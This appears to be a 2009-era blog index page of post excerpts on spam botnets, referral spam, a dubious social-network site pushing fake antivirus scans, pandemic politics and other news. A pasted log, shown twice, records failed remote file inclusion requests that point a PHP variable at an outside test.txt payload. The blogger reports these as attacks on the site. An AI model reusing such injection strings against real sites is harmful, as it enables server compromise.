I had about half the usual quantity of spam this morning.
Maybe this is a consequence of Microsoft’s action against a huge list of domains which have been thought to be controlling thousands of computers in a botnet? Dubbed Waledac, the botnet is thought to have chucked out 1.5 billion spams from ~90k computers controlled by 277 domains. They reckoned in 18 days last December ~650 million spams went to Hotmail alone….
Microsoft called the technical and legal action Operation b49.
Remove Referrals Information from This Website because of Malware Like many blogs, this website has displayed the last few hits (referrals) that it’s received as a kind of ‘live’ activity recorder and a small service back to the referring website. However, I’ve had to pull this from my front page because over the last few...
Multiple Attempts to Drop Trojan on This Website Failed These are the Wassup details of the attack 69.65.41.165 2009-06-13 10:48:00 //?_SERVER[DOCUMENT_ROOT]=http://ww(…)omponents/com_frontpage/test.txt?? Referrer: Direct hit Hostname: 69.65.41.165 User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) OS: WinVista BROWSER: IE 7 10:33:14 ->//?_SERVER[DOCUMENT_ROOT]=http://www.fox(…)com/components/com_frontpage/test.txt?? 10:34:03 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? 10:34:30 ->/3099/google-treasure-chest-its-a-scam-a(…)com/components/com_frontpage/test.txt?? 10:37:43 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt?? 10:37:46 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? 10:47:59 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt?? 10:48:00 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? As...
I had an interesting referral from an external website early today. It was,
http://kexhoxonxk.iblogger.org/
iblogger.com has a decent WHOIS entry and is USA based. However, the sub-domain bit is a bit iffy.
MyBookFace.net
If you follow the link, it’s immediately redirected to
http://mybookface.net/
The tagline for this website is:
MyBookFace.net
MyBookFace is a friendly social networking alternative to MySpace and FaceBook.
This seems clear and is an obvious parody or amalgam of the two global chatter stations.
Social Networking Problem
The problem with “MyBookFace” is it’s WHOIS – or rather it’s lack of information in it’s whois!!!
The registration is blocked by NameCheap.com, which is a bit odd for a public, socially-networked company!
Malware?
Checking up on the ‘company’ I’ve found references to it being a source of malware in the past – but not currently. These are Google & McAfee.
But checking other things, like the tagline above, we find >4000 websites with exactly the same phrase in it – and some of them look decidely dodgy! Try this search and see….?
ESET NOD32 Antivirus Warning of Krytik.AAR trojan
Many of the sites are sexual or cracked entertainment places that all require you to download a “video viewer” or similar. Many others are no more than catalogue-type directories plastered with adverts. This is an example of an attempted trojan installation attack on my system from one random site I visited… After a highly entertaining psuedo-system ‘scan’ which said my ‘system’ had about 57 trojans in it, it then tried to run the setup.exe file.
This was a highly plausible looking scan for newbie-types. It showed various drives and even a gif-image of a supposed “Windows Alert”. The Joomla powered website was,
www.techniz.co.uk/rss.php?magadheera%20review
…called the MAGADHEERA REVIEW
Weakest Link - Goodbye!
There are also a heap of reported cracks of various WordPress websites if you Google for “MyBookFace scam” or similar. It’s sites like these, I think, that have been the source of my referral spam.
Like everything else, WordPress must be set up and maintained correctly, just like a car, if it’s to work properly.
Conclusion – MyFaceBook. You are the weakest link. Goodbye!
I haven’t done any more checks. But IMHO, Google & McAfee want to do more checks. While MyBookFace.crap may not be the source of malware, anything one-click away seems to be!
Multiple Attempts to Drop Trojan on This Website Failed These are the Wassup details of the attack 69.65.41.165 2009-06-13 10:48:00 //?_SERVER[DOCUMENT_ROOT]=http://ww(…)omponents/com_frontpage/test.txt?? Referrer: Direct hit Hostname: 69.65.41.165 User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) OS: WinVista BROWSER: IE 7 10:33:14 ->//?_SERVER[DOCUMENT_ROOT]=http://www.fox(…)com/components/com_frontpage/test.txt?? 10:34:03 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? 10:34:30 ->/3099/google-treasure-chest-its-a-scam-a(…)com/components/com_frontpage/test.txt?? 10:37:43 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt?? 10:37:46 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? 10:47:59 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt?? 10:48:00 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? As...
Introduction This is a small investigation into mail lists and scammy companies. Some companies are fine, but I always go by the adage to judge a man by the company he keeps. This shows how lists spread far beyond their initial purpose when you sign up for something. It also shows how the privacy policies...
There is currently a world-wide flu epidemic and it’s interesting to compare the responses of various countries to it, with the historical pandemic of The Plague, i.e. the Black Death.
Flu
In the USA, it’s been called “Mexican Flu” sometimes quite pejoratively, especially at it’s outset and especially by some. – link & even worse link
In Europe, especially the UK, it’s called “swine flu” and there’s been a bit of a minor panic. – link There will shortly be enough medicine for everyone in the country.
In China, massive quarantines have been set up. – link
In Egypt, they killed all the pigs to piss off the pig-owning Christians… – link
Plague
In China, two neighbours, miles from help and contact, have died from the lethal septicaemic type of plaque. China has now quarantined tens of thousands of people. – link
In the USA, about 2 people a year die from The Black Death. Usually, there’s a small news item and a handful of people are either quarantined or dosed with medicines. But they don’t call it Mexican Plaque. – link
In Mexico, probably a couple of people a year die from Plague – however, all articles I can find relate to New Mexico deaths (e.g. link) or to racist comments about Mexico (e.g. this crap i.e. no facts, just racial slur). I can’t find any actual recent Mexican deaths from plague apart from 1920! Between the USA and Mexico, thousands die annually in drug-related crime.
In Egypt, it’s closes it’s borders and declared a state of emergency! – link
Conclusion
Virus
Massive pandemics have always created panic and historically, it’s always the least advantaged or minorities in a society that have suffered.
When the plague erupted in the Middle Ages, Jews were massacred in Germany and burnt for “poisoning wells”. Old women, cripples, nearby tribes, nations or religions, you name it - they’ve all been made scapegoats for the completely natural and organic organisms behind infection.
Judge from the above how much ignorance exists both in the leadership and general population within the various societies for the causes, effects and solutions to the problem.
In the above video, shot with a mobile phone and first reported at the beginning of April this year, some blokes, watched by a load of other blokes, whip a young woman for breaking some law. At that time, the Taliban blokes (for it is them) had just come to an agreement with the Pakistan...
Man with Black Hat Blames Everyone Else! Ahmad Khatami, a member of the Assembly of Experts in Iran who has a black hat, has said that the fingertips of the West are definitely on the ghastly bombing in the south-east Iranian city of Zahedan on Thursday. So it’s all my fault then…? Interestingly, within two...
Via TheP5 I spotted this amazing graphs site http://graphjam.com which is right up my street of pseudo-graphology! Try it out, it’s infectious – or make your own!
It’s come to my attention that old steakncake has a new girlfriend. I think that if he’s superstitious he should change his name to Clive - or not mayhap! It’s a very moving love story....
Decent people everywhere will be appalled to learn that the charity Mencap recently sponsored an award at the first ever ERSA Employability Awards. ERSA are the trade body who were formed in 2005 to lie on behalf of the money … Continue reading → […]
The Civil Service Rank and File Network have called a rally outside the PCS conference this week to demand action from the union on the vicious benefit sanctioning regime. Benefit sanctions are set to become a huge issue for public … Continue reading → […]
